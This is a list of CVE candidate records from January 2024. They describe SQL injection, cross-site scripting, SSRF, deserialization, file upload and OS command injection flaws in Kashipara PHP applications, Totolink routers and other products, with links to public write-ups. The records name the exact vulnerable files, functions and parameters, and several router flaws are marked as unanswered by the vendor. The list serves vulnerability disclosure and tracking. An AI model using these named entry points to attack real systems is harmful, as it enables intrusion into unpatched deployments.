CVE    2024    307    Candidate    A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login_process.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249874 is the identifier assigned to this vulnerability.    MISC:https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf   |   URL:https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf   |   MISC:https://vuldb.com/?ctiid.249874   |   URL:https://vuldb.com/?ctiid.249874   |   MISC:https://vuldb.com/?id.249874   |   URL:https://vuldb.com/?id.249874    Assigned (20240107)
CVE    2024    306    Candidate    A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file /admin/admin_login_process.php. The manipulation of the argument admin_password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249873 was assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf   |   MISC:https://vuldb.com/?ctiid.249873   |   URL:https://vuldb.com/?ctiid.249873   |   MISC:https://vuldb.com/?id.249873   |   URL:https://vuldb.com/?id.249873    Assigned (20240107)
CVE    2024    305    Candidate    A vulnerability was found in Guangzhou Yingke Electronic Technology Ncast up to 2017 and classified as problematic. Affected by this issue is some unknown functionality of the file /manage/IPSetup.php of the component Guest Login. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249872.    MISC:https://github.com/2267787739/cve/blob/main/logic.md   |   URL:https://github.com/2267787739/cve/blob/main/logic.md   |   MISC:https://vuldb.com/?ctiid.249872   |   URL:https://vuldb.com/?ctiid.249872   |   MISC:https://vuldb.com/?id.249872   |   URL:https://vuldb.com/?id.249872    Assigned (20240107)
CVE    2024    304    Candidate    A vulnerability has been found in Youke365 up to 1.5.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /app/api/controller/collect.php. The manipulation of the argument url leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249871.    MISC:https://note.zhaoj.in/share/3jF3Xpl3ttlZ   |   URL:https://note.zhaoj.in/share/3jF3Xpl3ttlZ   |   MISC:https://vuldb.com/?ctiid.249871   |   URL:https://vuldb.com/?ctiid.249871   |   MISC:https://vuldb.com/?id.249871   |   URL:https://vuldb.com/?id.249871    Assigned (20240107)
CVE    2024    303    Candidate    A vulnerability, which was classified as critical, was found in Youke365 up to 1.5.3. Affected is an unknown function of the file /app/api/controller/caiji.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249870 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/fssH60eQkvSl   |   URL:https://note.zhaoj.in/share/fssH60eQkvSl   |   MISC:https://vuldb.com/?ctiid.249870   |   URL:https://vuldb.com/?ctiid.249870   |   MISC:https://vuldb.com/?id.249870   |   URL:https://vuldb.com/?id.249870    Assigned (20240107)
CVE    2024    302    Candidate    A vulnerability, which was classified as critical, has been found in fhs-opensource iparking 1.5.22.RELEASE. This issue affects some unknown processing of the file /vueLogin. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249869 was assigned to this vulnerability.    MISC:https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf   |   URL:https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf   |   MISC:https://vuldb.com/?ctiid.249869   |   URL:https://vuldb.com/?ctiid.249869   |   MISC:https://vuldb.com/?id.249869   |   URL:https://vuldb.com/?id.249869    Assigned (20240107)
CVE    2024    301    Candidate    A vulnerability classified as critical was found in fhs-opensource iparking 1.5.22.RELEASE. This vulnerability affects the function getData of the file src/main/java/com/xhb/pay/action/PayTempOrderAction.java. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249868.    MISC:https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf   |   URL:https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf   |   MISC:https://vuldb.com/?ctiid.249868   |   URL:https://vuldb.com/?ctiid.249868   |   MISC:https://vuldb.com/?id.249868   |   URL:https://vuldb.com/?id.249868    Assigned (20240107)
CVE    2024    300    Candidate    A vulnerability was found in Beijing Baichuo Smart S150 Management Platform up to 20240101. It has been rated as critical. Affected by this issue is some unknown functionality of the file /useratte/userattestation.php of the component HTTP POST Request Handler. The manipulation of the argument web_img leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249866 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/tolkent/cve/blob/main/upload.md   |   URL:https://github.com/tolkent/cve/blob/main/upload.md   |   MISC:https://vuldb.com/?ctiid.249866   |   URL:https://vuldb.com/?ctiid.249866   |   MISC:https://vuldb.com/?id.249866   |   URL:https://vuldb.com/?id.249866    Assigned (20240107)
CVE    2024    299    Candidate    A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. Affected by this vulnerability is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249865 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md   |   MISC:https://vuldb.com/?ctiid.249865   |   URL:https://vuldb.com/?ctiid.249865   |   MISC:https://vuldb.com/?id.249865   |   URL:https://vuldb.com/?id.249865    Assigned (20240107)
CVE    2024    298    Candidate    A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. Affected is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249864. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md   |   MISC:https://vuldb.com/?ctiid.249864   |   URL:https://vuldb.com/?ctiid.249864   |   MISC:https://vuldb.com/?id.249864   |   URL:https://vuldb.com/?id.249864    Assigned (20240107)
CVE    2024    297    Candidate    A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249863. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md   |   MISC:https://vuldb.com/?ctiid.249863   |   URL:https://vuldb.com/?ctiid.249863   |   MISC:https://vuldb.com/?id.249863   |   URL:https://vuldb.com/?id.249863    Assigned (20240107)
CVE    2024    296    Candidate    A vulnerability has been found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This vulnerability affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument host_time leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249862 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md   |   MISC:https://vuldb.com/?ctiid.249862   |   URL:https://vuldb.com/?ctiid.249862   |   MISC:https://vuldb.com/?id.249862   |   URL:https://vuldb.com/?id.249862    Assigned (20240107)
CVE    2024    295    Candidate    A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. This affects the function setWanCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249861 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md   |   MISC:https://vuldb.com/?ctiid.249861   |   URL:https://vuldb.com/?ctiid.249861   |   MISC:https://vuldb.com/?id.249861   |   URL:https://vuldb.com/?id.249861    Assigned (20240107)
CVE    2024    294    Candidate    A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected by this issue is the function setUssd of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ussd leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249860. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md   |   MISC:https://vuldb.com/?ctiid.249860   |   URL:https://vuldb.com/?ctiid.249860   |   MISC:https://vuldb.com/?id.249860   |   URL:https://vuldb.com/?id.249860    Assigned (20240107)
CVE    2024    293    Candidate    A vulnerability classified as critical was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected by this vulnerability is the function setUploadSetting of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249859. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md   |   MISC:https://vuldb.com/?ctiid.249859   |   URL:https://vuldb.com/?ctiid.249859   |   MISC:https://vuldb.com/?id.249859   |   URL:https://vuldb.com/?id.249859    Assigned (20240107)
CVE    2024    292    Candidate    A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249858 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md   |   MISC:https://vuldb.com/?ctiid.249858   |   URL:https://vuldb.com/?ctiid.249858   |   MISC:https://vuldb.com/?id.249858   |   URL:https://vuldb.com/?id.249858    Assigned (20240107)
CVE    2024    291    Candidate    A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249857 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md   |   MISC:https://vuldb.com/?ctiid.249857   |   URL:https://vuldb.com/?ctiid.249857   |   MISC:https://vuldb.com/?id.249857   |   URL:https://vuldb.com/?id.249857    Assigned (20240107)
CVE    2024    290    Candidate    A vulnerability, which was classified as critical, has been found in Kashipara Food Management System 1.0. This issue affects some unknown processing of the file stock_edit.php. The manipulation of the argument item_type leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249851.    MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md   |   URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md   |   MISC:https://vuldb.com/?ctiid.249851   |   URL:https://vuldb.com/?ctiid.249851   |   MISC:https://vuldb.com/?id.249851   |   URL:https://vuldb.com/?id.249851    Assigned (20240107)
CVE    2024    289    Candidate    A vulnerability classified as critical was found in Kashipara Food Management System 1.0. This vulnerability affects unknown code of the file stock_entry_submit.php. The manipulation of the argument itemype leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249850 is the identifier assigned to this vulnerability.    MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md   |   URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md   |   MISC:https://vuldb.com/?ctiid.249850   |   URL:https://vuldb.com/?ctiid.249850   |   MISC:https://vuldb.com/?id.249850   |   URL:https://vuldb.com/?id.249850    Assigned (20240107)
CVE    2024    288    Candidate    A vulnerability classified as critical has been found in Kashipara Food Management System 1.0. This affects an unknown part of the file rawstock_used_damaged_submit.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249849 was assigned to this vulnerability.    MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md   |   URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md   |   MISC:https://vuldb.com/?ctiid.249849   |   URL:https://vuldb.com/?ctiid.249849   |   MISC:https://vuldb.com/?id.249849   |   URL:https://vuldb.com/?id.249849    Assigned (20240107)
CVE    2024    287    Candidate    A vulnerability was found in Kashipara Food Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file itemBillPdf.php. The manipulation of the argument printid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249848.    MISC:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md   |   URL:https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md   |   MISC:https://vuldb.com/?ctiid.249848   |   URL:https://vuldb.com/?ctiid.249848   |   MISC:https://vuldb.com/?id.249848   |   URL:https://vuldb.com/?id.249848    Assigned (20240107)
CVE    2024    286    Candidate    A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file index.php#contact_us of the component Contact Form. The manipulation of the argument Name/Email/Message leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249843.    MISC:https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing   |   URL:https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.249843   |   URL:https://vuldb.com/?ctiid.249843   |   MISC:https://vuldb.com/?id.249843   |   URL:https://vuldb.com/?id.249843    Assigned (20240106)
CVE    2024    284    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as problematic. This issue affects some unknown processing of the file party_submit.php. The manipulation of the argument party_address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249839.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf   |   MISC:https://vuldb.com/?ctiid.249839   |   URL:https://vuldb.com/?ctiid.249839   |   MISC:https://vuldb.com/?id.249839   |   URL:https://vuldb.com/?id.249839    Assigned (20240106)
CVE    2024    283    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file party_details.php. The manipulation of the argument party_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249838 is the identifier assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf   |   MISC:https://vuldb.com/?ctiid.249838   |   URL:https://vuldb.com/?ctiid.249838   |   MISC:https://vuldb.com/?id.249838   |   URL:https://vuldb.com/?id.249838    Assigned (20240106)
CVE    2024    282    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as problematic. This affects an unknown part of the file addmaterialsubmit.php. The manipulation of the argument tin leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249837 was assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf   |   MISC:https://vuldb.com/?ctiid.249837   |   URL:https://vuldb.com/?ctiid.249837   |   MISC:https://vuldb.com/?id.249837   |   URL:https://vuldb.com/?id.249837    Assigned (20240106)
CVE    2024    281    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file loginCheck.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249836.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf   |   MISC:https://vuldb.com/?ctiid.249836   |   URL:https://vuldb.com/?ctiid.249836   |   MISC:https://vuldb.com/?id.249836   |   URL:https://vuldb.com/?id.249836    Assigned (20240106)
CVE    2024    280    Candidate    A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file item_type_submit.php. The manipulation of the argument type_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249835.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf   |   MISC:https://vuldb.com/?ctiid.249835   |   URL:https://vuldb.com/?ctiid.249835   |   MISC:https://vuldb.com/?id.249835   |   URL:https://vuldb.com/?id.249835    Assigned (20240106)
CVE    2024    279    Candidate    A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. Affected is an unknown function of the file item_list_edit.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249834 is the identifier assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf   |   MISC:https://vuldb.com/?ctiid.249834   |   URL:https://vuldb.com/?ctiid.249834   |   MISC:https://vuldb.com/?id.249834   |   URL:https://vuldb.com/?id.249834    Assigned (20240106)
CVE    2024    278    Candidate    A vulnerability, which was classified as critical, has been found in Kashipara Food Management System up to 1.0. This issue affects some unknown processing of the file partylist_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249833 was assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf   |   MISC:https://vuldb.com/?ctiid.249833   |   URL:https://vuldb.com/?ctiid.249833   |   MISC:https://vuldb.com/?id.249833   |   URL:https://vuldb.com/?id.249833    Assigned (20240106)
CVE    2024    277    Candidate    A vulnerability classified as critical was found in Kashipara Food Management System up to 1.0. This vulnerability affects unknown code of the file party_submit.php. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249832.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf   |   MISC:https://vuldb.com/?ctiid.249832   |   URL:https://vuldb.com/?ctiid.249832   |   MISC:https://vuldb.com/?id.249832   |   URL:https://vuldb.com/?id.249832    Assigned (20240106)
CVE    2024    276    Candidate    A vulnerability classified as critical has been found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file rawstock_used_damaged_smt.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249831.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf   |   MISC:https://vuldb.com/?ctiid.249831   |   URL:https://vuldb.com/?ctiid.249831   |   MISC:https://vuldb.com/?id.249831   |   URL:https://vuldb.com/?id.249831    Assigned (20240106)
CVE    2024    275    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file item_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249830 is the identifier assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf   |   MISC:https://vuldb.com/?ctiid.249830   |   URL:https://vuldb.com/?ctiid.249830   |   MISC:https://vuldb.com/?id.249830   |   URL:https://vuldb.com/?id.249830    Assigned (20240106)
CVE    2024    274    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file billAjax.php. The manipulation of the argument item_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249829 was assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf   |   MISC:https://vuldb.com/?ctiid.249829   |   URL:https://vuldb.com/?ctiid.249829   |   MISC:https://vuldb.com/?id.249829   |   URL:https://vuldb.com/?id.249829    Assigned (20240106)
CVE    2024    273    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as critical. Affected is an unknown function of the file addwaste_entry.php. The manipulation of the argument item_name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249828.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf   |   MISC:https://vuldb.com/?ctiid.249828   |   URL:https://vuldb.com/?ctiid.249828   |   MISC:https://vuldb.com/?id.249828   |   URL:https://vuldb.com/?id.249828    Assigned (20240106)
CVE    2024    272    Candidate    A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file addmaterialsubmit.php. The manipulation of the argument material_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249827.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf   |   MISC:https://vuldb.com/?ctiid.249827   |   URL:https://vuldb.com/?ctiid.249827   |   MISC:https://vuldb.com/?id.249827   |   URL:https://vuldb.com/?id.249827    Assigned (20240106)
CVE    2024    271    Candidate    A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file addmaterial_edit.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249826 is the identifier assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf   |   MISC:https://vuldb.com/?ctiid.249826   |   URL:https://vuldb.com/?ctiid.249826   |   MISC:https://vuldb.com/?id.249826   |   URL:https://vuldb.com/?id.249826    Assigned (20240106)
CVE    2024    270    Candidate    A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file item_list_submit.php. The manipulation of the argument item_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249825 was assigned to this vulnerability.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf   |   MISC:https://vuldb.com/?ctiid.249825   |   URL:https://vuldb.com/?ctiid.249825   |   MISC:https://vuldb.com/?id.249825   |   URL:https://vuldb.com/?id.249825    Assigned (20240106)
CVE    2024    269    Candidate    ManageEngine ADAudit Plus versions 7270 and below are vulnerable to authenticated SQL injection in File-Summary DrillDown. This issue is fixed in version 7271.    MISC:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html   |   URL:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html    Assigned (20240106)
CVE    2024    268    Candidate    A vulnerability, which was classified as critical, has been found in Kashipara Hospital Management System up to 1.0. Affected by this issue is some unknown functionality of the file registration.php. The manipulation of the argument name/email/pass/gender/age/city leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249824.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf   |   MISC:https://vuldb.com/?ctiid.249824   |   URL:https://vuldb.com/?ctiid.249824   |   MISC:https://vuldb.com/?id.249824   |   URL:https://vuldb.com/?id.249824    Assigned (20240106)
CVE    2024    267    Candidate    A vulnerability classified as critical was found in Kashipara Hospital Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Parameter Handler. The manipulation of the argument email/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249823.    MISC:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf   |   MISC:https://vuldb.com/?ctiid.249823   |   URL:https://vuldb.com/?ctiid.249823   |   MISC:https://vuldb.com/?id.249823   |   URL:https://vuldb.com/?id.249823    Assigned (20240106)
CVE    2024    266    Candidate    A vulnerability classified as problematic has been found in Project Worlds Online Lawyer Management System 1.0. Affected is an unknown function of the component User Registration. The manipulation of the argument First Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249822 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing   |   URL:https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.249822   |   URL:https://vuldb.com/?ctiid.249822   |   MISC:https://vuldb.com/?id.249822   |   URL:https://vuldb.com/?id.249822    Assigned (20240106)
